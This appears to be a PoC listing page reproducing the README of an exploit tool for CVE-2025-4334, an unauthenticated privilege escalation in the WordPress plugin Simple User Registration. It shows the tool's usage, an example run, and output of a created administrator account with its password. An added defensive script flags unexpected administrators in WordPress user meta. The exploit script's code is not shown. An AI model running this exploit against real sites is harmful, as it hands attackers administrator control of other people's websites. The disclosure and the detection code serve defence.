CVE-2025-4334 PoC — WordPress plugin Simple User Registration security vulnerability

Source
Associated Vulnerability
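Title: WordPress plugin Simple User Registration security vulnerability (CVE-2025-4334)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. A security vulnerability exists in WordPress plugin Simple User Registration 6.3 and earlier; it stems from insufficient restrictions on user meta values and may lead to privilege escalation.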
Description
Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation
Readme
# 🔓 Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation

## 📄 Description

The **Simple User Registration** plugin for WordPress is vulnerable to **Privilege Escalation** in all versions up to, and including, **6.3**.  
This is due to insufficient restrictions on user meta values that can be supplied during registration.  
This makes it possible for **unauthenticated attackers** to register as an **administrator**.

---

## 🛡️ Vulnerability Details

- **Type**: Improper Privilege Management  
- **CVE**: CVE-2025-4334  
- **CVSS Score**: 9.8 (Critical)  
- **CVSS Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`  
- **Publicly Published**: June 25, 2025  
- **Last Updated**: June 26, 2025  

---

## 🛠️ Exploit Script

The exploit script automates the privilege escalation: it submits the registration form using the nonce, form ID, and referer path extracted from the form page.

### ⚙️ Usage

```bash
python CVE-2025-4334.py -h
```

```
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Base WordPress URL (e.g. http://localhost/wordpress/)
  --form FORM    Full URL of the page that contains the registration form
```

---

## 🌐 URL Explanation

- `-u` → Base WordPress installation (e.g. `http://localhost/wordpress/`)  
- `--form` → Full URL to the vulnerable registration form (e.g. `http://localhost/wpr/default-registration/`)

---

## 🧪 Example

```bash
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/
```

#### ✅ Result

```
[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : test@admin.ksa
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)
```
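
For responders: WordPress core records each user's roles in the `wp_capabilities` user meta row as a PHP-serialized array, so an account like the one in the result above shows up there regardless of how it was registered. The audit below is an added example, not part of the PoC repository; the `wp_` table prefix, the constructed sample rows, the allowlist of known administrator IDs and the function names are assumptions, and only the `Nxploitedadmin` / `test@admin.ksa` values come from the output above.

```python
import re
from datetime import datetime

# Constructed sample rows, shaped like the result of:
#   SELECT u.ID, u.user_login, u.user_email, u.user_registered, m.meta_value
#   FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
#   WHERE m.meta_key = 'wp_capabilities';
# "wp_" is the default table prefix (assumption); row 13 reuses the PoC's reported values.
SAMPLE_ROWS = [
    (1, "siteowner", "owner@example.org", "2023-02-11 09:14:02", 'a:1:{s:13:"administrator";b:1;}'),
    (7, "alice", "alice@example.org", "2025-05-30 18:40:55", 'a:1:{s:10:"subscriber";b:1;}'),
    (13, "Nxploitedadmin", "test@admin.ksa", "2025-06-27 03:22:10", 'a:1:{s:13:"administrator";b:1;}'),
    (14, "bob", "bob@example.org", "2025-06-28 11:05:41", 'a:2:{s:6:"editor";b:1;s:13:"administrator";b:0;}'),
]

# One entry of the serialized array: s:<byte length>:"<role>";b:<0|1>;
ROLE_ENTRY = re.compile(r's:(\d+):"([^"]*)";b:([01]);')

def granted_roles(serialized):
    """Return the roles set to true in a PHP-serialized wp_capabilities value."""
    roles = set()
    for length, name, flag in ROLE_ENTRY.findall(serialized):
        if int(length) == len(name.encode()) and flag == "1":
            roles.add(name)
    return roles

def suspicious_admins(rows, known_admin_ids, since):
    """Administrators outside the allowlist, registered on or after `since`."""
    cutoff = datetime.strptime(since, "%Y-%m-%d")
    findings = []
    for user_id, login, email, registered, caps in rows:
        if "administrator" not in granted_roles(caps):
            continue
        if user_id in known_admin_ids:
            continue
        if datetime.strptime(registered, "%Y-%m-%d %H:%M:%S") >= cutoff:
            findings.append((user_id, login, email, registered))
    return findings

if __name__ == "__main__":
    for hit in suspicious_admins(SAMPLE_ROWS, known_admin_ids={1}, since="2025-06-25"):
        print("review account:", hit)
```

The `since` value here is the publication date listed above; moving it back to the date the plugin was installed widens the review window.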

---

## ⚠️ Disclaimer

This script is provided for **educational and research purposes only**.  
The author is **not responsible** for any misuse or damage caused by this tool.

---

*By: Khaled_alenazi (Nxploited)*
File Snapshot

```
[4.0K] /data/pocs/0a4e331b978b5d25eefe8da05082a3f0d4bebfcc
├── [3.4K] CVE-2025-4334.py
├── [1.1K] LICENSE
├── [2.4K] README.md
└── [   9] requirements.txt

0 directories, 4 files
```